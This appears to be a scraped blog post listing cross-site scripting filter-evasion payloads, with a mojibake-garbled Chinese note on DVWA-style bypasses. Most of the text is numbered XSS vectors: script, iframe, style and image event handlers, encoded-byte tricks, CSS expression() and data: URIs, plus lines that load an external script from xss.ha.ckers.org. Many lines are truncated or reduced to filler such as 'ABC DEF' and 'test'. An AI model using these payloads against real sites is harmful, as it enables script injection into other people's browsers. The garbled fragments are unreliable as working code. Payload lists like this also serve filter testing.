厚颜无耻的挂上博客HacL+求波星 :)
´úÂë¹ýÂË£º medium--> ˫дÈƹý£º<sc<script>ript>alert(/xss/)</script> ´óСд»ìÏýÈƹý£º<ScRipt>alert(/xss/)</script> high-->ͨ¹ýimg¡¢bodyµÈ±êÇ©µÄʼþ»òÕßiframeµÈ±êÇ©µÄsrc×¢Èë¶ñÒâµÄjs´úÂë: prompt(¡®qq¡¯) onmouseover=¡¯alert(xss)¡¯ onmouseover=¡¯prompt(qq)¡¯
<script>alert('hello£¬gaga!');</script></IFRAME>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
alert('XSS');</STYLE>
.XSS{background-image:url("javascript.:alert('XSS')");}</STYLE>
BODY{background:url("javascript.:alert('XSS')")}</STYLE>
getURL("javascript.:alert('XSS')")
a="get";b="URL";c="javascript.:";d="alert('XSS');";eval(a+b+c+d);
"> <SCRIPT>function a(){alert('XSS');}</SCRIPT><"
</SCRIPT>
</SCRIPT>">http://xss.ha.ckers.org/a.js"></SCRIPT>
"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
</SCRIPT>">http://xss.ha.ckers.org/a.js"></SCRIPT>
'"SRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
<SCRIPT>document.write("PTSRC="http://xss.ha.ckers.org/a.js"></SCRIPT>
link
javascript:alert(1);</script>
javascript:alert(2);</script>
javascript:alert(3);</script>
javascript:alert(4);</script>
javascript:alert(5);</script>
javascript:alert(6);</script>
javascript:alert(7);</script>
'`"><\x3Cscript>javascript:alert(8)</script>
'`"><\x00script>javascript:alert(9)</script>
<script src=16 href=16 onerror="javascript:alert(16)"></script>
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(18)"></title onPropertyChange>
<iframe onLoad iframe onLoad="javascript:javascript:alert(19)"></iframe onLoad>
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(23)"></script onReadyStateChange>
<style onLoad style onLoad="javascript:javascript:alert(34)"></style onLoad>
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(35)"></iframe onReadyStateChange>
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(37)"></style onReadyStateChange>
<script onLoad script onLoad="javascript:javascript:alert(41)"></script onLoad>
<iframe onload iframe onload="javascript:javascript:alert(63)"></iframe onload>
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(70)"></iframe onbeforeload>
<iframe src iframe src="javascript:javascript:alert(71)"></iframe src>
\x3Cscript>javascript:alert(75)</script>
'"`><script>/* *\x2Fjavascript:alert(76)// */</script>
<script>javascript:alert(77)javascript:alert(78)javascript:alert(79)
<script>a='hello\x27;javascript:alert(88)//';</script>
test test test test test test test test test test test test test test <script>/* *\x2A/javascript:alert(103)// */</script> <script>/* *\x00/javascript:alert(104)// */</script> <style></style> <style></style> <style></style> <style></style> <style></style> "'`>ABCDEF
"'`>ABC
DEF
<script>if("x\\xE112\x96\x89".length==2) { javascript:alert(112);}</script>
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(113);}</script>
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(114);}</script>
'`"><\x3Cscript>javascript:alert(115)</script>
'`"><\x00script>javascript:alert(116)</script>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(117)>
"'`><\x00img src=xxx:x onerror=javascript:alert(118)>
<script src="data:text/plain\x2Cjavascript:alert(119)"></script>
<script src="data:\xD4\x8F,javascript:alert(120)"></script>
<script src="data:\xE0\xA4\x98,javascript:alert(121)"></script>
<script src="data:\xCB\x8F,javascript:alert(122)"></script>
javascript:alert(123);</script>
javascript:alert(124);</script>
javascript:alert(125);</script>
javascript:alert(126);</script>
javascript:alert(127);</script>
javascript:alert(128);</script>
javascript:alert(129);</script>
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
ABC
DEF
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
"`'><script>\x3Bjavascript:alert(224)</script>
"`'><script>\x0Djavascript:alert(225)</script>
"`'><script>\xEF\xBB\xBFjavascript:alert(226)</script>
"`'><script>\xE2\x80\x8227javascript:alert(227)</script>
"`'><script>\xE2\x80\x84javascript:alert(228)</script>
"`'><script>\xE3\x80\x80javascript:alert(229)</script>
"`'><script>\x09javascript:alert(230)</script>
"`'><script>\xE2\x80\x89javascript:alert(231)</script>
"`'><script>\xE2\x80\x85javascript:alert(232)</script>
"`'><script>\xE2\x80\x88javascript:alert(233)</script>
"`'><script>\x00javascript:alert(234)</script>
"`'><script>\xE2\x80\xA8javascript:alert(235)</script>
"`'><script>\xE2\x80\x8Ajavascript:alert(236)</script>
"`'><script>\xE237\x9A\x80javascript:alert(237)</script>
"`'><script>\x0Cjavascript:alert(238)</script>
"`'><script>\x2Bjavascript:alert(239)</script>
"`'><script>\xF0\x90\x96\x9Ajavascript:alert(240)</script>
"`'><script>-javascript:alert(241)</script>
"`'><script>\x0Ajavascript:alert(242)</script>
"`'><script>\xE2\x80\xAFjavascript:alert(243)</script>
"`'><script>\x7Ejavascript:alert(244)</script>
"`'><script>\xE2\x80\x87javascript:alert(245)</script>
"`'><script>\xE2\x8246\x9Fjavascript:alert(246)</script>
"`'><script>\xE2\x80\xA9javascript:alert(247)</script>
"`'><script>\xC2\x85javascript:alert(248)</script>
"`'><script>\xEF\xBF\xAEjavascript:alert(249)</script>
"`'><script>\xE2\x80\x83javascript:alert(250)</script>
"`'><script>\xE2\x80\x8Bjavascript:alert(251)</script>
"`'><script>\xEF\xBF\xBEjavascript:alert(252)</script>
"`'><script>\xE2\x80\x80javascript:alert(253)</script>
"`'><script>\x2254javascript:alert(254)</script>
"`'><script>\xE2\x80\x82javascript:alert(255)</script>
"`'><script>\xE2\x80\x86javascript:alert(256)</script>
"`'><script>\xE257\xA0\x8Ejavascript:alert(257)</script>
"`'><script>\x0Bjavascript:alert(258)</script>
"`'><script>\x20javascript:alert(259)</script>
"`'><script>\xC2\xA0javascript:alert(260)</script>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
javascript:alert(270)</script>
javascript:alert(271)</script>
javascript:alert(272)</script>
javascript:alert(273)</script>
javascript:alert(274)</script>
javascript:alert(275)</script>
javascript:alert(276)</script>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
<script>javascript:alert(284)<\x00/script>
x
<script>javascript:alert(316)</script>">
<script>javascript:alert(317)</script>">
<script>javascript:alert(318)</script>">
">
<% foo>
<script>d.innerHTML=d.innerHTML</script>
XXX
<title onpropertychange=javascript:alert(360)></title><title title=>
X
<style>p[foo=bar{}*{-o-link:'javascript:javascript:alert(368)'}{}*{-o-link-source:current}]{color:red};</style>
@import "data:,*%7bx:expression(javascript:alert(370))%7D";</style>
XXXXXX
<style>*{x:expression(javascript:alert(376))}</style>
X
<script>({set/**/$($){_/**/setter=$,_=javascript:alert(384)}}).$=eval</script>
<script>({0:#0=eval/#0#/#0#(javascript:alert(385))})</script>
<script>ReferenceError.prototype.__defineGetter__('name', function(){javascript:alert(386)}),x</script>
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('javascript:alert(387)')()</script>
¼script¾javascript:alert(390)¼/script¾
X
392
393
395
XXX
<STYLE>li {list-style-image: url("javascript:javascript:alert(429)");}</STYLE>
x
<script>javascript:alert(405)</script>
<STYLE>li {list-style-image: url("javascript:javascript:alert(429)");}</STYLE>
- XSS <IFRAME SRC="javascript:javascript:alert(432);"></IFRAME>